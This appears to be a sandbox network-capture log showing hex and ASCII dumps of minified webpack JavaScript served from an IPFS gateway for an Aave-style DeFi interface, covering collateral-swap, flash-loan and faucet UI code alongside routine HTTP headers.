                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 32 32 36 5d 2c 7b 31 32 35 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 4f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 34 39 35 30 31 29 2c 73 3d 72 28 38 35 38 39 33 29 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 30 2c 73 2e 6a 73 78 29 28 6e 2e 63 43 2c 7b 69 64 3a 22 44 75 65 20 74 6f 20 69 6e 74 65 72 6e 61 6c 20 73 74 45 54 48 20 6d 65 63 68 61 6e 69 63 73 20 72 65 71 75 69 72 65 64 20 66 6f 72 20 72 65 62 61 73 69 6e 67 20 73 75 70 70 6f 72
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1226],{1252:function(e,t,r){r.d(t,{O:function(){return a}});var n=r(49501),s=r(85893),a=function(){return(0,s.jsx)(n.cC,{id:"Due to internal stETH mechanics required for rebasing suppor
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 61 72 20 4a 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 3d 65 2e 61 6d 6f 75 6e 74 54 6f 53 77 61 70 2c 61 3d 65 2e 61 6d 6f 75 6e 74 54 6f 52 65 63 65 69 76 65 2c 6f 3d 65 2e 69 73 57 72 6f 6e 67 4e 65 74 77 6f 72 6b 2c 69 3d 65 2e 73 78 2c 6c 3d 65 2e 70 6f 6f 6c 52 65 73 65 72 76 65 2c 75 3d 65 2e 74 61 72 67 65 74 52 65 73 65 72 76 65 2c 63 3d 65 2e 69 73 4d 61 78 53 65 6c 65 63 74 65 64 2c 64 3d 65 2e 75 73 65 46 6c 61 73 68 4c 6f 61 6e 2c 70 3d 65 2e 6c 6f 61 64 69 6e 67 2c 6d 3d 65 2e 73 79 6d 62 6f 6c 2c 66 3d 65 2e 62 6c 6f 63 6b 65 64 2c 78 3d 65 2e 62 75 69 6c 64 54 78 46 6e 2c 68 3d 28 30 2c 55 2e 5a 29 28 65 2c 4b 29 2c 76 3d 28 30 2c 7a 2e 59 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 5b 65 2e 73 77 61 70
                                                                                                                                                                                                                                                  Data Ascii: ar J=function(e){var t,r=e.amountToSwap,a=e.amountToReceive,o=e.isWrongNetwork,i=e.sx,l=e.poolReserve,u=e.targetReserve,c=e.isMaxSelected,d=e.useFlashLoan,p=e.loading,m=e.symbol,f=e.blocked,x=e.buildTxFn,h=(0,U.Z)(e,K),v=(0,z.Y)((function(e){return[e.swap
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 6c 61 74 65 72 61 6c 5d 2e 6c 69 6d 69 74 2c 73 6b 69 70 3a 70 7c 7c 21 72 7c 7c 30 3d 3d 3d 70 61 72 73 65 46 6c 6f 61 74 28 72 29 2c 73 70 65 6e 64 65 72 3a 6e 75 6c 6c 21 3d 3d 28 74 3d 62 2e 61 64 64 72 65 73 73 65 73 2e 53 57 41 50 5f 43 4f 4c 4c 41 54 45 52 41 4c 5f 41 44 41 50 54 45 52 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 22 22 2c 64 65 70 73 3a 5b 75 2e 73 79 6d 62 6f 6c 2c 72 5d 7d 29 2c 6a 3d 77 2e 61 70 70 72 6f 76 61 6c 2c 41 3d 77 2e 61 63 74 69 6f 6e 2c 4f 3d 77 2e 61 70 70 72 6f 76 61 6c 54 78 53 74 61 74 65 2c 54 3d 77 2e 6d 61 69 6e 54 78 53 74 61 74 65 2c 44 3d 77 2e 6c 6f 61 64 69 6e 67 54 78 6e 73 2c 43 3d 77 2e 72 65 71 75 69 72 65 73 41 70 70 72 6f 76 61 6c 3b 72 65 74 75 72 6e 28 30 2c 47 2e 6a 73 78 29 28 71 2e 42 2c 66
                                                                                                                                                                                                                                                  Data Ascii: lateral].limit,skip:p||!r||0===parseFloat(r),spender:null!==(t=b.addresses.SWAP_COLLATERAL_ADAPTER)&&void 0!==t?t:"",deps:[u.symbol,r]}),j=w.approval,A=w.action,O=w.approvalTxState,T=w.mainTxState,D=w.loadingTxns,C=w.requiresApproval;return(0,G.jsx)(q.B,f
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 51 2e 68 45 29 28 69 29 29 2c 66 3d 28 30 2c 47 2e 6a 73 78 73 29 28 47 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 47 2e 6a 73 78 29 28 65 65 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 72 65 63 74 61 6e 67 75 6c 61 72 22 2c 68 65 69 67 68 74 3a 32 30 2c 77 69 64 74 68 3a 31 30 30 2c 73 78 3a 7b 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 7d 7d 29 2c 28 30 2c 47 2e 6a 73 78 29 28 65 65 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 72 65 63 74 61 6e 67 75 6c 61 72 22 2c 68 65 69 67 68 74 3a 31 35 2c 77 69 64 74 68 3a 38 30 2c 73 78 3a 7b 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 2c 6d 61 72 67 69 6e 54 6f 70 3a 22 34 70 78 22 7d 7d 29 5d 7d 29 3b 72 65 74 75 72 6e 28 30 2c 47 2e 6a 73 78 73 29 28 47 2e 46 72 61 67 6d
                                                                                                                                                                                                                                                  Data Ascii: Q.hE)(i)),f=(0,G.jsxs)(G.Fragment,{children:[(0,G.jsx)(ee.Z,{variant:"rectangular",height:20,width:100,sx:{borderRadius:"4px"}}),(0,G.jsx)(ee.Z,{variant:"rectangular",height:15,width:80,sx:{borderRadius:"4px",marginTop:"4px"}})]});return(0,G.jsxs)(G.Fragm
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 6f 6e 54 68 72 65 73 68 6f 6c 64 2c 66 75 74 75 72 65 56 61 6c 75 65 3a 6f 2e 72 65 73 65 72 76 65 2e 66 6f 72 6d 61 74 74 65 64 52 65 73 65 72 76 65 4c 69 71 75 69 64 61 74 69 6f 6e 54 68 72 65 73 68 6f 6c 64 2c 70 65 72 63 65 6e 74 3a 21 30 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a 30 2c 6c 6f 61 64 69 6e 67 3a 75 7d 29 2c 28 30 2c 47 2e 6a 73 78 29 28 74 65 2e 58 2c 7b 63 61 70 74 69 6f 6e 3a 28 30 2c 47 2e 6a 73 78 29 28 73 2e 63 43 2c 7b 69 64 3a 22 53 75 70 70 6c 79 20 62 61 6c 61 6e 63 65 20 61 66 74 65 72 20 73 77 69 74 63 68 22 7d 29 2c 63 61 70 74 69 6f 6e 56 61 72 69 61 6e 74 3a 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 6d 62 3a 34 2c 61 6c 69 67 6e 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 47 2e 6a
                                                                                                                                                                                                                                                  Data Ascii: onThreshold,futureValue:o.reserve.formattedReserveLiquidationThreshold,percent:!0,visibleDecimals:0,loading:u}),(0,G.jsx)(te.X,{caption:(0,G.jsx)(s.cC,{id:"Supply balance after switch"}),captionVariant:"description",mb:4,align:"flex-start",children:(0,G.j
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 22 2c 63 6f 6c 6f 72 3a 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22 7d 29 5d 7d 29 7d 29 5d 7d 29 7d 29 5d 7d 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 65 28 65 2c 74 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 74 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6e 29 7d
                                                                                                                                                                                                                                                  Data Ascii: ",color:"text.secondary"})]})})]})})]})};function ne(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 69 6e 67 41 73 73 65 74 3d 3d 3d 6e 65 2e 61 64 64 72 65 73 73 7d 29 29 2c 63 65 3d 78 2e 5a 2e 6d 69 6e 28 72 2e 75 6e 64 65 72 6c 79 69 6e 67 42 61 6c 61 6e 63 65 2c 6e 65 77 20 78 2e 5a 28 74 2e 61 76 61 69 6c 61 62 6c 65 4c 69 71 75 69 64 69 74 79 29 2e 6d 75 6c 74 69 70 6c 69 65 64 42 79 28 2e 39 39 29 29 2e 74 6f 53 74 72 69 6e 67 28 31 30 29 2c 64 65 3d 22 2d 31 22 3d 3d 3d 51 2c 70 65 3d 64 65 3f 63 65 3a 51 2c 6d 65 3d 28 30 2c 4f 2e 6b 29 28 7b 63 68 61 69 6e 49 64 3a 57 2e 75 6e 64 65 72 6c 79 69 6e 67 43 68 61 69 6e 49 64 7c 7c 55 2c 75 73 65 72 41 64 64 72 65 73 73 3a 48 2c 73 77 61 70 49 6e 3a 73 65 28 73 65 28 7b 7d 2c 74 29 2c 7b 7d 2c 7b 61 6d 6f 75 6e 74 3a 65 65 2e 63 75 72 72 65 6e 74 7d 29 2c 73 77 61 70 4f 75 74 3a 73 65 28 73 65 28
                                                                                                                                                                                                                                                  Data Ascii: ingAsset===ne.address})),ce=x.Z.min(r.underlyingBalance,new x.Z(t.availableLiquidity).multipliedBy(.99)).toString(10),de="-1"===Q,pe=de?ce:Q,me=(0,O.k)({chainId:W.underlyingChainId||U,userAddress:H,swapIn:se(se({},t),{},{amount:ee.current}),swapOut:se(se(
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 29 3b 63 61 73 65 20 42 2e 4e 49 2e 46 4c 41 53 48 5f 4c 4f 41 4e 5f 4e 4f 54 5f 41 56 41 49 4c 41 42 4c 45 3a 72 65 74 75 72 6e 28 30 2c 47 2e 6a 73 78 29 28 73 2e 63 43 2c 7b 69 64 3a 22 44 75 65 20 74 6f 20 68 65 61 6c 74 68 20 66 61 63 74 6f 72 20 69 6d 70 61 63 74 2c 20 61 20 66 6c 61 73 68 6c 6f 61 6e 20 69 73 20 72 65 71 75 69 72 65 64 20 74 6f 20 70 65 72 66 6f 72 6d 20 74 68 69 73 20 74 72 61 6e 73 61 63 74 69 6f 6e 2c 20 62 75 74 20 41 61 76 65 20 47 6f 76 65 72 6e 61 6e 63 65 20 68 61 73 20 64 69 73 61 62 6c 65 64 20 66 6c 61 73 68 6c 6f 61 6e 20 61 76 61 69 6c 61 62 69 6c 69 74 79 20 66 6f 72 20 74 68 69 73 20 61 73 73 65 74 2e 20 54 72 79 20 6c 6f 77 65 72 69 6e 67 20 74 68 65 20 61 6d 6f 75 6e 74 20 6f 72 20 73 75 70 70 6c 79 69 6e 67 20 61
                                                                                                                                                                                                                                                  Data Ascii: );case B.NI.FLASH_LOAN_NOT_AVAILABLE:return(0,G.jsx)(s.cC,{id:"Due to health factor impact, a flashloan is required to perform this transaction, but Aave Governance has disabled flashloan availability for this asset. Try lowering the amount or supplying a
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 3a 63 65 2c 69 6e 70 75 74 54 69 74 6c 65 3a 28 30 2c 47 2e 6a 73 78 29 28 73 2e 63 43 2c 7b 69 64 3a 22 53 75 70 70 6c 69 65 64 20 61 73 73 65 74 20 61 6d 6f 75 6e 74 22 7d 29 2c 62 61 6c 61 6e 63 65 54 65 78 74 3a 28 30 2c 47 2e 6a 73 78 29 28 73 2e 63 43 2c 7b 69 64 3a 22 53 75 70 70 6c 79 20 62 61 6c 61 6e 63 65 22 7d 29 2c 69 73 4d 61 78 53 65 6c 65 63 74 65 64 3a 64 65 7d 29 2c 28 30 2c 47 2e 6a 73 78 73 29 28 64 2e 5a 2c 7b 73 78 3a 7b 70 61 64 64 69 6e 67 3a 22 31 38 70 78 22 2c 70 74 3a 22 31 34 70 78 22 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 73 70 61 63 65 2d 62 65 74 77 65 65 6e 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 47 2e 6a 73 78 29 28 70 2e 5a 2c 7b 73 78 3a 7b 66 6f 6e 74 53
                                                                                                                                                                                                                                                  Data Ascii: :ce,inputTitle:(0,G.jsx)(s.cC,{id:"Supplied asset amount"}),balanceText:(0,G.jsx)(s.cC,{id:"Supply balance"}),isMaxSelected:de}),(0,G.jsxs)(d.Z,{sx:{padding:"18px",pt:"14px",display:"flex",justifyContent:"space-between"},children:[(0,G.jsx)(p.Z,{sx:{fontS


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  34192.168.2.549747209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC739OUTGET /_next/static/chunks/8701.d52e3ab5e2f5c410.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:42 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 12936
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidon43grfot4tlnoe2k22heax7alfiahubllt3koun22jusvfzcqq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/8701.d52e3ab5e2f5c410.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreidon43grfot4tlnoe2k22heax7alfiahubllt3koun22jusvfzcqq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 7486607
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 37 61 39 37 37 38 63 39 62 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e417a9778c9b-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 37 30 31 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 36 34 38 33 36 29 3b 74 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 6e 28 72 28 36 34 39 33 38 29 29 2c 73 3d 72 28 38 35 38 39 33 29 2c 69 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 73 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31 20 31 2e 32 36
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8701],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),s=r(85893),i=(0,o.default)((0,s.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 28 28 28 74 2c 72 29 3d 3e 28 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 65 2e 73 70 61 63 69 6e 67 26 26 6e 75 6c 6c 21 3d 65 2e 73 70 61 63 69 6e 67 5b 72 5d 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 65 2e 64 69 72 65 63 74 69 6f 6e 26 26 6e 75 6c 6c 21 3d 65 2e 64 69 72 65 63 74 69 6f 6e 5b 72 5d 29 26 26 28 74 5b 72 5d 3d 21 30 29 2c 74 29 29 2c 7b 7d 29 2c 73 3d 28 30 2c 69 2e 50 24 29 28 7b 76 61 6c 75 65 73 3a 65 2e 64 69 72 65 63 74 69 6f 6e 2c 62 61 73 65 3a 6f 7d 29 2c 63 3d 28 30 2c 69 2e 50 24 29 28 7b 76 61 6c 75 65 73 3a 65 2e 73 70 61 63 69 6e 67 2c 62 61 73 65 3a 6f 7d 29 3b 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 73 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 66 6f 72 45 61 63 68 28 28
                                                                                                                                                                                                                                                  Data Ascii: (((t,r)=>(("object"===typeof e.spacing&&null!=e.spacing[r]||"object"===typeof e.direction&&null!=e.direction[r])&&(t[r]=!0),t)),{}),s=(0,i.P$)({values:e.direction,base:o}),c=(0,i.P$)({values:e.spacing,base:o});"object"===typeof s&&Object.keys(s).forEach((
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 63 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 72 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 73 78 2c 72 3d 28 30 2c 6f 2e 5a 29 28 65 2c 61 29 3b 72 65 74 75 72
                                                                                                                                                                                                                                                  Data Ascii: Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):c(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var d=function(e){var t=e.sx,r=(0,o.Z)(e,a);retur
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 63 61 70 3a 22 72 6f 75 6e 64 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 6a 6f 69 6e 3a 22 72 6f 75 6e 64 22 7d 29 2c 28 30 2c 69 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 31 36 2e 33 32 30 33 20 34 2e 33 39 37 39 33 56 32 2e 39 39 39 39 33 43 31 36 2e 33 32 30 32 20 32 2e 36 39 33 34 33 20 31 36 2e 32 34 39 37 20 32 2e 33 39 31 30 36 20 31 36 2e 31 31 34 32 20 32 2e 31 31 36 31 35 43 31 35 2e 39 37 38 37 20 31 2e 38 34 31 32 34 20 31 35 2e 37 38 31 38 20 31 2e 36 30 31 31 36 20 31 35 2e 35 33 38 37 20 31 2e 34 31 34 34 34 43 31 35 2e 32 39 35 36 20 31 2e 32 32 37 37 33 20 31 35 2e 30 31 32 39 20 31 2e 30 39 39 33 37 20 31 34 2e 37 31 32 34 20 31 2e 30 33 39 32 39 43 31 34 2e 34 31 31 38 20 30 2e 39 37 39 32 30 39 20 31 34 2e 31 30 31 35 20 30 2e 39
                                                                                                                                                                                                                                                  Data Ascii: cap:"round",strokeLinejoin:"round"}),(0,i.jsx)("path",{d:"M16.3203 4.39793V2.99993C16.3202 2.69343 16.2497 2.39106 16.1142 2.11615C15.9787 1.84124 15.7818 1.60116 15.5387 1.41444C15.2956 1.22773 15.0129 1.09937 14.7124 1.03929C14.4118 0.979209 14.1015 0.9
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 62 2e 42 2c 7b 72 65 71 75 69 72 65 73 41 70 70 72 6f 76 61 6c 3a 64 2c 62 6c 6f 63 6b 65 64 3a 6e 2c 70 72 65 70 61 72 69 6e 67 54 72 61 6e 73 61 63 74 69 6f 6e 73 3a 63 2c 68 61 6e 64 6c 65 41 63 74 69 6f 6e 3a 61 2c 61 63 74 69 6f 6e 54 65 78 74 3a 28 30 2c 79 2e 6a 73 78 29 28 73 2e 63 43 2c 7b 69 64 3a 22 46 61 75 63 65 74 20 7b 30 7d 22 2c 76 61 6c 75 65 73 3a 7b 30 3a 74 2e 73 79 6d 62 6f 6c 7d 7d 29 2c 61 63 74 69 6f 6e 49 6e 50 72 6f 67 72 65 73 73 54 65 78 74 3a 28 30 2c 79 2e 6a 73 78 29 28 73 2e 63 43 2c 7b 69 64 3a 22 50 65 6e 64 69 6e 67 2e 2e 2e 22 7d 29 2c 6d 61 69 6e 54 78 53 74 61 74 65 3a 6c 2c 69 73 57 72 6f 6e 67 4e 65 74 77 6f 72 6b 3a 72 7d 29 7d 3b 6e 7c 7c 28 6e 3d 7b 7d 29 3b 76 61 72 20 77 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b
                                                                                                                                                                                                                                                  Data Ascii: b.B,{requiresApproval:d,blocked:n,preparingTransactions:c,handleAction:a,actionText:(0,y.jsx)(s.cC,{id:"Faucet {0}",values:{0:t.symbol}}),actionInProgressText:(0,y.jsx)(s.cC,{id:"Pending..."}),mainTxState:l,isWrongNetwork:r})};n||(n={});var w=function(e){
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 6e 74 73 5b 74 5d 3a 7b 7d 3b 74 25 32 3f 6b 28 4f 62 6a 65 63 74 28 72 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 28 30 2c 6f 2e 5a 29 28 65 2c 74 2c 72 5b 74 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 6b 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69
                                                                                                                                                                                                                                                  Data Ascii: nts[t]:{};t%2?k(Object(r),!0).forEach((function(t){(0,o.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):k(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescri
